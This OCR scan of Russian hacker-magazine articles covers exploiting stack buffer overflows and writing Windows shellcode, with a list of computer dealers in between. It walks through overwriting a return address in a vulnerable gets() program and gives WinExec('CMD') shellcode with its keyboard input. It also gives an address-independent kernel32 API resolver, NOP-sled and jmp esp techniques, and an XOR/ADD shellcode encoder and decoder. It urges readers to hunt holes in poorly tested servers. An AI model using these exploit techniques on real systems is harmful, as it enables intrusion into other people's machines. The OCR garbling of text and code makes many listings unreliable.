лям служебных структур, поэтому даются без перевода) 


образом, мы получаем возможность 
модифицировать любую ячейку памя- 
ти уязвимой программы по своему ус- 
мотрению, например, перенаправить 
какой-нибудь указатель Ha shell-Kog. 


0 ТЕХНИКЕ ПОИСКА 
ЗАМОЛВИТЕ СЛОВО 

и Поиск переполняющихся буферов 
по степени накала страстей можно 
сравнить разве что с поиском клада. 
Наличие исходных текстов невероятно 
упрощает нашу задачу, но не преда- 
вайся напрасным иллюзиям: перепол- 
няющиеся буфера ищешь не ты один, 
все доступные исходники давным-дав- 
но зачитаны до дыр, и найти там что-то 
новое невероятно сложно. Дизассемб- 
лирование, конечно, посложнее будет 
(особенно на первых порах), зато и 
шансы открыть новую дыру значи- 
тельно возрастают. 

Чем шире распространено уязвимое 
приложение (операционная система), 
тем большую власть тебе дадут пере- 
полняющиеся буфера. Достаточно 
вспомнить нашумевшую историю с 
дырой в DCOM, открытой задолго go 
ее официального обнародования. 
Прикинь: миллионы тачек с Windows 
МТ по всему миру, и все - твои. Правда, 
TYT He все гладко. Windows и другие 
популярные системы находятся под 
пристальным вниманием тысяч специ- 
алистов и твоих коллег-хакеров. Коро- 
че говоря, здесь душно. 

Лучше брать какой-нибудь малоизве- 
стный клон UNIX'a или почтовый сер- 
вер, написанный дядей Ваней на ко- 
ленках, - он вообще никем протестиро- 
ван не был. Таких значительно боль- 
ше, чем специалистов! Ну и что с того, 
что они установлены на сотне-другой 
машин во всем мире? Вполне хватит 
пространства, чтобы похакерствовать. 

Собственно говоря, методик поиска 
переполняющихся буферов всего две, 
и обе они порочны и неправильны. Og- 
на из них, простая и не слишком ум- 
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ная, - методично скармливать исследу- 
емому сервису текстовые строки раз- 
личной длины и смотреть, как он на 
них отреагирует. Упадет - значит пере- 
полняющийся буфер обнаружен. Ра- 
зумеется, эта технология не всегда да- 
ет ожидаемый результат: можно прой- 
ти от здоровенной дыры в двух шагах 
и ничего не заметить. Допустим, сер- 
вер ожидает урл. Он наивно полагает, 
что имя протокола (ну там http или ftp) 
не может состоять больше чем из че- 
тырех букв; чтобы переполнить бу- 
ep, достаточно будет послать ему 
нечто вроде hittttittp://fuckyour.com. Обра- 
тите внимание: Пр.//ицииииииииииииску- 
our.com уже не сработает! А откуда мы 
заранее может знать, что именно за- 
был проконтролировать программист? 
Может, он понадеялся, что слэшей ни- 
когда не бывает больше двух? Или 
что двоеточие может быть только од- 
но? Перебирая все варианты вслепую, 
мы взломаем сервер не раньше, чем 
наступит конец света, когда это уже 
будет неактуально. А ведь большин- 
ство "серьезных" запросов состоит из 
сотен сложно взаимодействующих 
друг с другом полей, и метод перебора 
здесь становится бессилен! Вот тогда- 
то на помощь и придет систематичес- 
кий анализ. 

Теоретически для гарантированного 
обнаружения всех переполняющихся 
буферов достаточно просто построч- 
но вычитать весь сырец программы 
(дизассемблерный листинг) на пред- 
мет пропущенных проверок. Практи- 
чески же все упирается в чудовищный 
объем кода, который читать - не пере- 
читать. К тому же, не всякая отсутству- 
ющая проверка - уже дыра. Рассмот- 
рим следующий код: 


код #8 


f(char *src) 

{ 

char buf[0x10); 
strcpy(buf, src); 


Если длина строки src превысит Ox10 
символов, буфер проломит стену и зат- 
рет адрес возврата. Весь вопрос в том, 
проверяет ли материнская сдфункция 
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длину строки src перед ее передачей 
или нет. Даже если явных проверок 
нет, но строка сформируется таким об- 
разом, что она гарантированно не пре- 
высит отведенной ей величины (a сор- 
мироваться она может и в праматери- 
нской функции), то никакого перепол- 
нения буфера не произойдет и усилия 
на анализ будут потрачены впустую. 

Короче говоря, предстоит много кро- 
потливого труда. Кое-какую информа- 
ЦИЮ на этот счет можно почерпнуть из 
моих "Записок исследователя компью- 
терных вирусов", но мало. Поиск пере- 
полняющихся буферов очень трудно 
формализовать и практически невоз- 
можно автоматизировать. Microsoft 
вкладывает в технологии совершен- 
ствования анализа миллиарды долла- 
ров, но взамен получает сригу. Что же 
тогда вы от бедного (во всех отноше- 
ния) мыщьх'а хотите? 

Анализировать следует, в первую 
очередь, те буфера, на которые можно 
так или иначе воздействовать. Обыч- 
но это буфера, связанные с сетевыми 
сервисами, так как локальный взлом 
гораздо менее интересен. 


ПЕРЕПОЛНЕНИЕ НА ПРАКТИКЕ 
m Теперь, слегка ознакомившись с 
теоретической частью, мы попракти- 
куемся - уроним буфер. Откомпилиру- 
ем следующий демонстрационный 
пример (а еще лучше, возьмем гото- 
вый исполняемый срайл с диска) и за- 
пустим его на выполнение. 
Программа спрашивает у нас логин 
и пароль. Раз спрашивает, значит ко- 
пирует в буфер, а тут и до перепол- 
нения недалеко. Вводим "АААА" 
(много букв "А") в качестве имени и 
"ВВВВВ" в качестве пароля. Прог- 
рамма немедленно падает, реагируя 
на это критической ошибкой прило- 
жения. Ага, значит, переполнение все- 
таки есть! Присмотримся к нему внима- 


КОД #9. НАШ ТЕСТОВЫЙ 
СТЕНД 


#include <stdio.h> 
root() 


{ 
printf("your have a root!\n"); 


main() 
char passwd[16]; char [091116]; 


printf("login :"); gets(login); 
printf("passwd:"); gets(passwd); 
if (Istremp(login, "bob") && 

~strcmp(passwd,"god")) 
printf("hello, bob!\n"); 

} 


тельнее: Windows говорит, что 
"инструкция по адресу 0x41414141 o6pa- 
тилась к памяти по адресу Ox41414141". 
Откуда она взяла Ox41414141? Постой- 
те, да ведь Ox41 - это шестнадцатерич- 
ный АзС!-код буквицы "А". Значит, во- 
первых, переполнение произошло в 
буфере логина, а во-вторых, данный 
тип переполнения допускает передачу 
управления на произвольный код, пос- 
кольку регистр - указатель команд пе- 
реметнулся на содержащийся в хвосте 
буфера адрес. Случайным образом по 
адресу 0x41414141 оказался располо- 
жен бессмысленный мусор, возбужда- 
ющий процессор вплоть go исключе- 
ния, но этому горю легко помочь! 

Для начала нам предстоит выяс- 
нить, какие по счету символы логина 
попадают в адрес возврата. В этом 
нам поможет последовательность в 
стиле "qwerty...zxcvbnm", вводим ее 
и... система сообщает, что "инструк- 
ция по адресу Ox7a6c6b6a обрати- 
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Основная 
масса ха- 
лявных 
эксплоитов, 
блуждаю- 
щих по се- 
ти, спроек- 
тирована с 
грубыми, 
конструк- 
тивными 
ошибками и 
неработос- 
пособна в 
принципе. 
Те же из 
них, что ра- 
ботают, 
обычно ог- 
раничива- 
ются лишь 
демонстра- 
цией уязви- 
мости, но не 
дают ника- 
ких рычагов 
управления. 


Переполня- 
ющиеся бу- 
фера могут 
распола- 
гаться в од- 
ном из трех 
мест адрес- 
ного прост- 
ранства 
процесса: 
стеке, сег- 
менте дан- 
ных и куче. 


ЗООПАРК ПЕРЕПОЛНЯЮЩИХСЯ БУФЕРОВ о 


лась к памяти". Запускаем HIEW и на- 
биваем эти "7А 6С 6В 6А" на клавиа- 
туре. Получается "zIkj". Значит, в ад- 
рес возврата попали 17-1, 18-Й, 19-й и 
20-й символы логина (на архитектуре 
х86 младший байт записывается по 
меньшему адресу, то есть машинное 
слово, образно выражаясь, становит- 
ся к лесу передом, а к нам задом). 

Наскоро дизассемблировав прог- 
рамму (смотрим disasm.htm на диске), 
мы обнаруживаем в ней прелюбопыт- 
ную функцию root, с помощью кото- 
рой можно творить чудеса. Да вот бе- 
да: при нормальном развитии событий 
она никогда не получает управления. 
Если, конечно, не подсунуть адрес ее 
начала вместо адреса возврата. А ка- 
кой у root'a адрес? Смотрим - 
00401150h. Перетягиваем младшие 
байты на меньшие адреса и получаем 
50 11 40 00. Именно в таком виде ag- 
рес возврата хранится в памяти. Хо- 
рошо, что ноль в нем встретился 
лишь однажды, аккурат оказавшись 
на его конце. Пусть он и будет тем ну- 
лем, что служит завершителем всякой 
ASIIZ-cTpoku. Символам с кодами 50h 
и 40h соответствуют буквицы "Р" и 
"@". CumBony с кодом Tih соответству- 
ет комбинация <СЁ-С> или <Alt>+<0O, 1, 
7> (нажмите АК, введите на цифровой 
клавиатуре О, 1 и 7, отпустите Alt). 

Задержав дыхание, вновь запускаем 
программу и вводим 
"qwertyuiopasdfghP*Q@", пароль 
можно пропустить. Собственно гово- 
ря, символы "qwertyuiopasdfgh" могут 
быть любыми, главное, чтобы "Р^О@" 
располагались в 17-Й, 18-й и 19-й пози- 
циях. Нуль, завершающий строку, 
вводить не надо: функция gets засу- 
нет его самостоятельно. 

Если все сделано правильно, то прог- 
рамма победоносно выведет на экран 
"Your have root", подтверждая, что ата- 
ка сработала. Правда, по выходе из 
root'a программа немедленно грохнет- 
ся, так как в стеке находится мусор, но 
это уже неважно, ведь срункция root 
отработала и стала не нужна. 

Просто передавать управление на 
готовую функцию неинтересно (тем 
более что такой рункции в атакуемой 
программе может и не быть). Намного 
более действенно заслать Ha удален- 
ную машину свой собственный Shell- 
код и там его исполнить. 

Вообще говоря, организовать уда- 
ленный shell He так-то просто: необхо- 
димо, как минимум, установить 
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ТСР/УОР-соединение, попутно обманув 
доверчивый firewall, создать пайпы, 
связать их дескрипторами ввода/выво- 
да терминальной программы, а самому 
работать диспетчером, гоняя данные 
между сокетами и пайпами. Некоторые 
пытаются поступить проще, пробуя 
унаследовать дескрипторы, но на этом 
пути их ждет жестокий облом, так как 
дескрипторы не наследуются и такие 
эксплоиты не работают. Даже и не пы- 
тайся их оживить - все равно не полу- 
чится. Если среди читателей наберется 
кворум, эту тему можно будет осветить 
во всех подробностях, пока же ограни- 
чится локальным Shell'om, но и он для 
некоторых из вас будет своеобразных 
хакерским подвигом! 

Вновь запускаем нашу демонстраци- 
онную программу, срываем Oycpep, 
вводя строку "AAA...", но вместо того 
чтобы нажать "ОК" в диалоге крити- 
ческой ошибки приложения, давим "OT- 
мену", запускающую отладчик (для 
этого он должен быть установлен). 
Конкретно нас будет интересовать со- 
держимое регистра ESP в момент сбоя. 
На моей машине он равен OOI2FF94h, у 
тебя это значение может отличаться. 
Вводим этот адрес в окне дампа и, 
прокручивая его вверх/вниз, находим 
нашу строку "ААААА". В моем случае 
она расположена по адресу 
OO12FF 80h. 

Теперь мы можем изменить адрес 
возврата Ha 12FF94h, и тогда управле- 
ние будет передано на первый байт 
переполняющегося буфера. Остается 
лишь подготовить Shell-Kog. Чтобы 
вызвать командный интерпретатор в 
осях семейства МТ, необходимо дать 
команау WinExec("CMD", x). В 9x тако- 
го файла нет, но зато есть 
command.com, который есть анахро- 
низм. На языке ассемблера этот вы- 
зов может выглядеть так как на 
врезке. 


Потому что call O77E973CAh на самом 
gene ассемблируется в относительный 
вызов, чувствительный к местополо- 
жению са! а, что делает shell-Kog край- 
не немобильным. 

Почему в имени файла "CMD" 
(020444D43h, читаемое в обратном 
порядке) стоит пробел? Потому что в 
shell-koge не может присутствовать 
символ нуля - он служит завершите- 
лем строки. Если хвостовой пробел уб- 
рать, то получится OOO0444D43h, а это 
уже не входит в наши планы. Вместо 
этого мы делаем XOR eax, eax, обнуляя 
ЕАХ на лету и запихивая его в стек для 
формирования нуля, завершающего 
строку "CMD ". Но непосредственно в 
самом эНе!-коде этого нуля нет! 

Поскольку в отведенные нам 16 байт 
shell-Kog влезать никак не хочет, а оп- 
тимизировать его уже некуда, мы при- 
бегаем к вынужденной рокировке и 
перемещаем shell-Kog в парольный 
буфер, отстоящий от адреса возврата 
на 32 байта. Учитывая, что абсолют- 
ный адрес парольного буфера равен 
12ЕЕ7ОВ (у тебя он может быть дру- 
гим!), shell-kKog будет выглядеть так 
(просто переводим Пех-коды в А$С!- 
символы, вводя непечатные буквицы 
через alt+num): 


login 1234567890123456<alt-112><alt-255><alt-18> 
passwd:3<alt-192>PhCMD T<alt-184><alt-202>s<alt- 
233>w<alt-255><alt-208><alt-235><254> 


Вводим это в программу. Логин сры- 
вает стек и передает управление на па- 
рольный буфер, где лежит shell-Kog. На 
экране появляется приглашение кома- 
ноного интерпретатора. Все! Теперь с 
системой можно делать что угодно! 


ЗАКЛЮЧЕНИЕ 

m Пара общих соображений напосле- 
док. Переполняющиеся 6ycpepa - нас- 
только интересная тема, что ей, не ко- 


КОД #10. ПОДГОТОВКА $НЕГ-КОДА 


00000000: 33C0 xor 

00000002: 50 push 
00000003: 6843404420 push 
00000008: 54 push 
00000009: B8CA73E977 mov 
0000000Е: FFDO call 

00000010: EBFE jmps 


Здесь мы используем целый ряд хит- 
ростей и допущений, подробный раз- 
бор которых требует целой книги. Если 
говорить кратко, то 77E973CAh - это 
адрес АР|-функции WinExec, жестко 
прописанный в программу и добытый 
путем анализа экспорта сфайла KER- 
NEL32.DLL утилитой DUMPBIN. Это 
грязный и ненадежный прием, так как 
в каждой версии оси адрес функции 
свой и правильнее было бы добавить в 
shell-kog процедуру обработки экспор- 
та, описанную в следующей статье. По- 
чему вызываемый адрес предвари- 
тельно загружается в регистр ЕАХ? 


вах, еах 

eax 

020444043 ;" DMC" 
esp 

eax,077E973CA :"wesE" 
eax 

000000010 


леблясь, можно посвятить всю жизнь. 
Не отчаивайся и не раскисай при 
встрече с трудностями, первые проб- 
лески успеха придут лишь через нес- 
колько лет упорного чтения докумен- 
тации и бесчисленных экспериментов с 
компиляторами, дизассемблерами и от- 
ладчиками. Чтобы изучить повадки пе- 
реполняющихся буферов, мало уметь 
ломать, необходимо еще и программи- 
ровать. Кому только пришло в голову 
назвать хакерство вандализмом?! Это - 
интеллектуальная игра, требующая ог- 
ромной сосредоточенности и невероят- 
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ДЕНИКИН г. Москва (095) 787-4999 
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М.Видео г. Москва (095) 777-7775 
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Никс г. Москва (095) 216-7001 

Олди г. Москва (095) 284-0238 
Радиокомплект-Компьютер г. Москва (095) 953-5392, 953-5674 
Сетевая лаборатория г. Москва (095) 784-6490 
СтартМастер г. Москва (095) 967-1510 

Ф-Центр г. Москва (095) 472-6401, 205-3524 
CITELINK г. Москва (095) 745-2999 

Desten Computers г. Москва (095) 785-1080, 785-1077 
EISIE г. Москва (095) 777-9779 

ELST г. Москва (095) 728-4060 

ISM г. Москва (095) 718-4020, 280-5144 

NT - Polaris г. Москва (095) 970-1930 

ULTRA Computers г. Москва (095) 729-5255, 729-5244 
USN Computers г. Москва (095) 775-8202 
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ALTEX г. Нижний Новгород (8312) 166000, 657307 
Авиком г. Пермь (3422) 196158 

Алгоритм г. Казань (8432) 365272 

Аракул г. Нижневартовск (3466) 240920 

Арсенал г. Тюмень (3452) 464774 

ЗЕТ НСК г. Новосибирск (3832) 125142, 125438 
Интант г. Томск (3822) 560056, 561616 

Клосс Компьютер г. Екатеринбург (3432) 659549, 657338 
Компания НИТ г. Биробиджан (42622) 66632 
КомпьюМаркет г. Саратов (8452) 241314, 269710 
Меморек г. Уфа (3472) 378877, 220989 

Мэйпл г. Барнаул (3852) 244557, 364575 

Никас-ЭВМ г. Челябинск (3512) 349402 

Окей Компьютер г. Краснодар (8612) 601144, 602244 
Оргторг г. Киров (8332) 381065 

Прагма г. Самара (8462) 701787 

Риан - Урал г. Челябинск (3512) 335812 

Технополис г. Ростов на Дону (8632) 903111, 903335 
Фирма ТЕСТ г. Саранск (8342) 240591, 327726 
Экселент г. Мурманск (8152) 459634, 452757 


ТЕХНОТРЕЙД приглашает к сотрудничеству региональных дилеров и магазины розничной торговли. 
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ПИШЕМ SHELL-KOX 
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Коваленко Дмитрий aka Ingrem (ingrem@list.ru) 


ПИШЕМ SHELL-KOR! 


ОСНОВНЫЕ 


НАПИСАНИИ 


Для ЕХЕ- 
файлов сис- 
темный 
exeption об- 
работчик 
всегда на- 
ходится в 
Кегпе!3 2.41. 


Таблица 


двойных 
слов, каж- 
дое из кото- 
рых указы- 
вает на 
строку с за- 
вершающим 
нулем, со- 
держащую 
имя O4epeg- 
ной экспор- 
тируемой 
АР!-функ- 
ции. 


НЕМ. -КОДА 

m Kak ты уже знаешь, 
shell-Kog - это набор машинных 
инструкций, который переполняет бу- 
qpep атакуемого процесса. При этом 
shell-kog прикидывается чем-то безо- 
бидным, например, слишком длинной 
строкой. Он затирает память, распо- 
ложенную сразу за буфером, изме- 
няя данные, которые там находятся. 
Это меняет логику программы и поз- 
воляет shell-Kogy получить управле- 
ние. 5Ве|-коды обычно классифици- 
руют в зависимости от того, где нахо- 
дится переполняемый буфер - в сте- 
ковой памяти, в куче или в секции 
данных. Иногда еще shell-Kogb! разли- 
чают по данным, которые затираются 
(адрес возврата из функции, указа- 
тель на функцию, указатель на класс 
ит.п.). Несмотря на это основные 
принципы написания shell-KogosB всег- 
да одинаковы. Shell-Kog чем-то похож 
на вирус: в большинстве случаев не- 
известно, по какому адресу в памяти 
он окажется. Поэтому хакер, который 
пишет $Ве!-код, обычно сталкивается 
с несколькими проблемами. Первая 
заключается в том, что для безус- 
ловных переходов внутри shell-Koga 
нельзя использовать "дальние" ва- 
рианты инструкций jmp и call, потому 
что в качестве аргумента в них выс- 
тупает абсолютный адрес. Но это не 
так уж страшно, зВе!-код обычно ма- 
ленький и редко требует "дальние" 
переходы. Вторая проблема - локаль- 
ные переменные. Но она тоже реша- 
ется довольно просто. Если shell-kog 
переполняет буфер в стеке, то на его 
голову обычно указывает esp, так 
что все переменные можно адресо- 
вать с помощью смещения: 


shell_code_start: 
; занесем в еах лок. переменную var_l 
mov eax, [esptvar_l-shell_code_start] 
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ПРИНЦИПЫ СОЗДАНИЯ SHELL-KODA 
И СВЯЗАННЫЕ С ЭТИМ ПРОБЛЕМЫ 


Если же shell-kog находится в куче, 
то, получив управление, он может 
провернуть старый вирусный фокус: 


shell_code_start: 

call $+5 

pop ebp 

sub ebp, 5; Tenepb B ebp - agpec 
shell_code_start 


После этого он может обращаться к 
локальным переменным по смещению 
относительно ebp. Третья проблема - 
самая сложная. Как вызывать из Shell- 
кода API? Ведь сначала нужно как-то 
узнать их адреса. Но каким образом? 
"Законно" зНе!-код эти адреса полу- 
чить не может (хотя бы потому, что у 
него нет таблицы импорта). Поэтому 
нам остаются только способы "неза- 
конные". Из них наиболее распрост- 
ранены два. Первый: запомнить agpe- 
ca API и вызвать их напрямую; это 
очень просто, хотя не слишком удач- 
но. Адреса АР! могут отличаться в 
разных версиях Windows и даже в 
разных сервиспаках одной и той же 
версии. Это сильно снижает шансы на 
успешную атаку удаленной системы. 
Второй способ: найти адреса API, ис- 
пользуя какую-то вирусную технику. 
Это намного универсальнее, но слож- 
нее, и код в результате получается 
больше. Вирусных техник существует 
около десятка. Прежде чем за них 
браться, нужно изучить формат 
Portable EXE (РЕ) и неплохо разби- 
раться в некоторых особенностях ар- 
хитектуры Windows. Для примера мы 
реализуем наиболее распространен- 
ную технику - нахождение адреса АР! 
путем анализа библиотеки kernel32.dll 
в памяти. Чтобы не лезть в теорети- 
ческие дебри, давай напишем проце- 
дуру, которая находит адрес API- 
функции по ее имени. Эта процедура 
будет адресно-независимой, рабочей 
на всех версиях Windows, и ее можно 
будет использовать без каких-либо 
дополнительных корректив. Так что 
если ты не горишь желанием ковы- 
ряться в формате РЕ, просто бери ее 
и используй (1МС-файл ты найдешь на 


диске). Если же ты прочтешь коммен- 
тарии и не поленишься во всем ра- 
зобраться - большой тебе респект! :-) 


Алгоритм процедуры поиска адреса API- 
функции по ее имени 


‚ процедура находит адрес api и смещение 
этого адреса в таблице экспорта 

; BXOQ: @CX -- длина имени 

; @Si -- адрес строки с именем 

; ВЫХО0: ebx -- адрес адреса АР! 

; edx -- адрес API 

‚ вах -- адрес "головы" kernel32.dll 

getapi2k proc 


Сначала нужно найти какой-то адрес 
внутри kernel32.dll. Для этого мы 
просканируем цепочку $ЕН-структур. 
Указатель на первую такую структуру 
лежит по fs:[0]. SEH-ctpyktypa имеет 
довольно интересное строение: ее 
первое двойное слово - адрес следу- 
ющей в цепочке $ЕН-структуры, BTO- 
poe двойное слово - адрес exeption 
обработчика. Последняя в цепочке 
структура первым двойным словом 
имеет OXFFFFFFFF, а вторым - адрес 
системного exeption обработчика 
(именно он выдает "Инструкция по ag- 


mov eax, fs:[0] ; заносим в eax адрес 
первой структуры SEH 

getapi2k_10: ; идем дальше по цепочке 
ЗЕН-стуктур 

mov ebx, [eax] ; заносим в ebx адрес 
следующей 5ЕН-структуры 

cmp ebx, -1; адрес равен OFFFFFFFFh? 
je getapi2k_20 ; ga! - значит эта ЗЕН-струк- 
тура - последняя в цепочке 

mov eax, еБх ; нет... идем дальше 

jmp short getapi2k_10 

getapi2k_20: 

mov eax, [eax+4] 


Теперь eax содержит какой-то адрес 
внутри kernel32.dll. При загрузке РЕ- 
файла Windows помещает его образ 
по адресу, кратному 64 К. Найдем ag- 
рес образа kernel32.dll (фактически 
адрес его DOS стаба). Учтем, что ker- 
nel32.dll первыми двумя байтами име- 
ет сигнатуру 'MZ'. 


XOF ах, ах ; выровняем найденный адрес 
на 64 К 

getapi2k_1: 

mov ebx, [eax] ; читаем 4 байта в ebx 

cmp bx, 5A4Dh ; 'М7' найден? 

je getapi2k_2; ga! 

sub eax, 010000h; нет - увеличим eax Ha 64 К 
jmp short getapi2k_1 

getapi2k_2: 


На данном этапе eax содержит адрес 
DOS стаба kernel32.dll. Проанализиру- 
ем образ kernel32.dll в памяти. Цель - 
найти таблицу экспорта. Анализ реа- 
лизуется следующим образом: 


; Поскольку в РЕ все смещения записаны 
относительно адреса 005 стаба, то нам 
придется все время их корректировать, 
добавляя к смещениям еах 

mov ebx, eax ; копируем в ebx адрес DOS 
стаба 

add ebx, [eax+3Ch]; добавляем к ebx сме- 
щение PE заголовка (OHO лежит по смеще- 
нию Ox3C от начала стаба) 

add ebx, 78h ; добавляем к ebx смещение 
указателя на таблицу экспорта относи- 
тельно заголовка РЕ 

mov ebx, [ebx] ; заносим в ebx смещение 
таблицы экспорта 

add ebx, eax ; коррекция на стаб 

mov edx, [ebx+20h]; смещение таблицы 
имен 

add edx, eax; коррекция смещения на стаб 
push ebx ; запомним указатель на таблицу 
экспорта 

xor ebx, ebx; ebx теперь стал счетчиком 


Теперь у нас есть указатель Ha таб- 
лицу имен. 

Поиск нужного имени организуем 
следующим образом: 


getapi2k_4: 

push esi 

push есх ; сохраняем в стеке регистры, 
которые будут изменятся при сравнении 
строк (esi содержит имя нужной нам 
функции, есх - ее длину) 

mov edi, [edx] ; смещение очередного 
имени АР!-функции 

add edi, eax; коррекция смещения на стаб 
гере cmpsb; сравнение 

je getapi2k_3; нашли! 

pop есх; He нашли - восстанавливаем 
регистры 

pop esi 

add edx, 4; в edx - следующий элемент 
таблицы имен 

inc ebx ; увеличить счетчик и на новый 
виток цикла 

jmp short getapi2k_4 


Сейчас в ebx располагается индекс 
имени нужной АР! в таблице имен. 
Дальше делаем так: 


getapi2k_3: 

Pop есх; сбалансируем стек - вытолкнем 
из него @Si и есх, 

рор есх; сохраненные во время сравнения 
строк 

рор есх; последний рор заносит в есх 
адрес таблицы экспорта (помните? мы его 


сохранили на стеке) 

shl ebx, 1; умножаем ebx на 2, это нам 
будет нужно в дальнейшем 

mov edx, [ecx+24h] ; заносим в edx адрес 
таблицы ординалов 

add edx, eax; корректируем его 

add edx, ebx; добавляем к нему смещение 
в ebx - получаем адрес номера АР! в таб- 
лице адресов 

mov edx, [edx]; заносим в edx номер API в 
таблице адресов 

and edx, OFFFFh; (поскольку номер АР! - 
это WORD, обнулим старшее слово edx) 


В edx - номер в таблице адресов, в 
eax - адрес DOS стаба, в есх - адрес 
export table. A вот теперь можем най- 
ти адрес интересующей нас АР! ;-): 


mov ebx, [ecx+iCh]; заносим в есх смеще- 
ние таблицы адресов 

add ebx, eax; коррекция на стаб 

shl edx, 2; находим смещение адреса API в 
таблице адресов (множим edx на 4) 

add ebx, edx; находим этот адрес 

mov edx, [ebx] ; читаем его в ebx 

add edx, eax; коррекция на стаб 

ret; все! 

getapi2k endp 


Как видим, все это довольно слож- 
но. Но, увы, такова специфика пере- 
носимого кода. 


ОСОБЕННОСТИ ПЕРЕДАЧИ 
УПРАВЛЕНИЯ: БОЛЬШОЙ 
БУФЕР С МОР"АМИ 

ш Поехали дальше. Допустим, мы 
можем подменить адрес возврата на 
свой или переписать указатель на ка- 
кую-то функцию, которую вот-вот вы- 
зовут. Ну, а что дальше? Куда пере- 
дать управление - какой адрес запи- 
сать вместо настоящего? В качестве 
одного из вариантов довольно часто 
управление передают на инструкцию 
jmp esp, которую в процессе написа- 
ния shell-koga находят либо в коде 
приложения, либо в какой-то систем- 
ной библиотеке, загруженной в его 
адресное пространство. Как правило, 
сам поиск производят с помощью ко- 
манды $ отладчика Soft-lce: 


$10000000 L FFFFFFFF ff e4 
(ff e4 - код инструкции) 


Это традиционный способ переда- 
чи управления на $Ве!-код, и ника- 
ких трудностей здесь не возникает. 
Но в некоторых случаях при написа- 
нии °Ве!-кода управление выгодно 
передать какому-то другому коду, 
например jmp eax, где eax может 
указывать не на начало Oycpepa, a 
выше - в середину или вообще в об- 
ласть памяти позади него :(. Что же 
делать в этом случае? Решение go- 
вольно простое: нужно погонять 
код уязвимой процедуры под отлад- 
кой в различных условиях и выяс- 
нить хотя бы пределы, в которых из- 
меняется еах. 


Буфер с пор'ами 


Допустим, на отладке видно, что 
адрес в еах обычно не превышает 
100 байт от начала буфера. Тогда 
при написании shell-koga этот интер- 
вал нужно заполнить пор'ами, а уже 
после них разместить какой-то по- 
лезный код. 

После выполнения jmp eax управле- 
ние попадет на один из пор'ов. Когда 
все пор'ы, идущие после, выполнятся, 
управление в конце-концов попадет 
на полезный код. Эта техника так и 
называется - "большой буфер с 
пор'ами". 


ТОНКОСТИ НАПИСАНИЯ 
СТРОКОВОГО SHELL-KOA 

m Большинство реальных перепол- 
нений - строковые. С одной стороны, 
это хорошо. Когда мы ищем уязви- 
мость, то знаем, что длинные строки 
надо пробовать в первую очередь. С 
другой стороны, возникает неболь- 
шая проблема. Если shell-kog внедря- 
ется в приложение в виде строки, он 
не должен содержать нулевых байт. 
При чтении строки с $Ве!-кодом в бу- 
cpep ноль будет воспринят как ее ко- 
нец и Пе!-код внедрится не пол- 
НОСТЬЮ. А это не есть гуд :(. Вот поче- 
му shell-Kog обычно делят на две час- 
ти. Первая часть ("тело" shell-Koga) - 
это небольшой переносимый код, ко- 
торый открывает консоль с админски- 
ми правами или закачивает троян из 
инета, в общем, делает что-то полез- 
ное. После того как тело написано и 
отлажено, хакер его шиофрует так, 
чтобы в нем не было нулевых байт. 
Естественно, в зашифрованном виде 
тело работать не может. Поэтому к не- 
му цепляется вторая часть ("голова") - 
небольшой код-дешифровщик, также 
не содержащий нулей. Сперва управ- 
ление получает голова. Она дешиф- 
рует "тело" и отдает управление ему, 
после чего shell-Kog спокойно делает 
свои темные делишки ;-). 

LUucpposxa тела shell-koga и написа- 
ние головы - не такие уж простые за- 
нятия. Большинство авторов рекомен- 
дуют шифровать побайтно, с по- 
мощью последовательного примене- 
ния инструкций ADD и ХОК. 

Что такое ADD? Всего лишь сложе- 
ние! Если мы зашифровали байт, go- 
бавив к нему что-то, мы можем так же 
просто его расшифровать, нужно 
только это "что-то" отнять. ХОК - это 


вообще прелесть! "Поксорив" байт, у 


МОР - это 
однобайт- 
ная команда 
с опкодом 
0x90, кото- 
рая сама по 
себе ничего 
не делает. 


Чаще всего 
голова раз- 
мещается 
перед телом 
shell-Koga, 
но это He 
обязатель- 
но. 
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BUFFER OVERFLOW 


Инструкции 
ADD и XOR 
используют 
в основном 
из-за того, 
что их 
действие 
обратимо. 


В большин- 
стве случа- 
ев на про- 
цедуры 
шифровки- 
дешифров- 
ки полкило- 
байта кода 
хватает за 
глаза ;-). 
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ПРОЦЕДУРА ШИФРОВАНИЯ С ИСПОЛЬЗОВАНИЕМ 


ИНСТРУКЦИЙ ADD И XOR 


; еах - адрес тела 
; есх - его длина 
crypt_exploit: 


mov bi, byte ptr[eax] ; читаем очередной байт Tena в Ы 


xor bl, XOR_KEY; ксорим ero Ha XOR_KEY 

add bl, ADD_KEY; добавляем к нему ADD_KEY 

mov byte ptr[eax], bl ; записываем зашифрованный байт в тело 
inc eax ; перемещаем указатель Ha следующий байт Tena 

loop crypt_exploit; если есх не равно О - новый виток цикла 

ret 


например, Ha OXFF, мы ero зашифро- 
вываем. "Поксорив" его опять Ha то 
же самое OXFF, расшифровываем. 
XOR_KEY и ADD_KEY - два байта, иг- 
рающие в нашем шисфровании роль 
ключей. О них мы поговорим чуть поз- 
же. Сейчас лучше остановимся на голо- 
ве shell-Koga - процедуре дешифровки: 


exploit_head: 

; заносим в есх длину тела shell-Koga (для 
простоты считаем, что она не больше 255 
байт), стараемся, чтобы код не содержал 
нулевых байт, поэтому вместо 

mov есх, expl_end-expl_start делаем Tak: 
хог @CX, есх 

mov cl, expl_end-expl_start 

; заносим в еах уазатель на тело эксплои- 
та, опять-таки стараемся, что бы код не со- 
держал нулевых байт 

MOV еах, езр; заносим в eax адрес головы 
зпе!-кода 

; добавляем смещение на тело 

add eax, expl_start-exploit_head 

; теперь все готово для дешифровки 

@@1: mov bl, byte ptr[eax] ; читаем очеред- 
ной байт зашифрованного тела в DI 

add bl, -ADD_KEY; отнимаем от него 
ADD_KEY 

xor bl, XOR_KEY; ксорим его на XOR_KEY 
mov byte ptr[eax], bl; записываем 
расшифрованный байт в тело 

inc eax ; перемещаем указатель на 
следующий байт тела 

loop @@1; если есх не равен 0 - новый 
виток цикла 

expl_start: 

; тугнаходится Teno shell-koga 

expl_end dd 0; нулевой байт, завершает 
строку с shell-KOogoM 


Как видим, процедура расшифровки 
почти не отличается от процедуры 
шифрования. Правда, в ней есть не- 
которые важные нюансы. Во-первых, 
если при шифровании мы сперва ксо- 
рили, а затем прибавляли, то при рас- 
шисффровке мы делаем наоборот: cnep- 
ва отнимаем, а затем ксорим. Во-вто- 
рых, сама процедура расшифровки не 
содержит нулевых байт - в этом мож- 
но убедиться, загнав ее под отладку. 
Само собой, обе процедуры могут ис- 
пользовать только одну из инструк- 
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ций - AND или ХОБ. Например, для то- 
го чтобы использовать только ХОК, 
достаточно закомментировать в про- 
цедуре шифрования строчку: add bl, 
